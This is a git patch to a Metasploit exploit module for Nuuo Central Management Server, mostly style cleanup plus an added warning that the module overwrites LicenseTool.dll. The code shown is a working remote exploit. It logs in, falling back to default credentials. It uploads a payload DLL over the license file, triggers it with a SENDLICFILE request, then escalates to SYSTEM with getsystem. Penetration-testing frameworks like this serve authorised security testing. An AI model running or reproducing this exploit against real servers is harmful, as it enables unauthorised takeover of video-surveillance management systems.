From 2b714108075d178f54444e66ece8736a46314162 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 19 Feb 2019 05:48:54 -0600 Subject: [PATCH] Minor updates exploit:nuuo_cms_fu --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 48 +++++++++++--------- 1 file changed, 26 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index c9b992198f..cc41127759 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + + This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module + fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will + not execute successfully. }, 'License' => MSF_LICENSE, 'Author' => @@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Nuuo Central Management Server <= v2.4.0', {} ], ], 'Privileged' => true, - 'DisclosureDate' => "Oct 11 2018", + 'DisclosureDate' => 'Oct 11 2018', 'DefaultTarget' => 0)) end def on_new_session(client) - if client.type == "meterpreter" - print_warning("Please wait a bit while we clean up") + if client.type == 'meterpreter' + print_warning('Please wait a bit while we clean up') client.sys.process.get_processes().each do |proc| - if proc['name'] == "NCS_Server.exe" + if proc['name'] == 'NCS_Server.exe' client.sys.process.kill(proc['pid']) - sleep 5 + Rex.sleep(5) client.shell_command_token("move /y #{@dll} LicenseTool.dll") - client.sys.process.execute("NCS_Server.exe") - print_good("Successfully restored LicenseTool.dll!") + client.sys.process.execute('NCS_Server.exe') + print_good('Successfully restored LicenseTool.dll!') end end # elevate privs to system (we're already Admin anyway), and we're done! - client.run_cmd("getsystem") - print_good("We should have SYSTEM now, enjoy your shell!") + client.run_cmd('getsystem') + print_good('We should have SYSTEM now, enjoy your shell!') else - print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll') print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") - print_error("... otherwise the Nuuo CMS installation will be nuked!") - print_good("Anyway, enjoy your shell!") + print_error('... otherwise the Nuuo CMS installation will be nuked!') + print_good('Anyway, enjoy your shell!') end end def exploit nucs_login - if @nucs_session == nil - fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") + unless @nucs_session + fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') end # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) print_status("Backing up LicenseTool.dll to #{@dll}") - dll_data = nucs_download_file("LicenseTool.dll") + dll_data = nucs_download_file('LicenseTool.dll') nucs_upload_file(@dll, dll_data) - print_status("Uploading payload...") - nucs_upload_file("LicenseTool.dll", generate_payload_dll) + print_status('Uploading payload...') + nucs_upload_file('LicenseTool.dll', generate_payload_dll) - print_status("Sleeping 15 seconds...") - sleep 15 + print_status('Sleeping 15 seconds...') + Rex.sleep(15) - print_status("Sending SENDLICFILE request, shell incoming!") + print_status('Sending SENDLICFILE request, shell incoming!') license_data = rand_text_alpha(50..350) - nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", - "Content-Length: " + license_data.length.to_s], license_data) + nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic", + 'Content-Length: ' + license_data.length.to_s], license_data) end end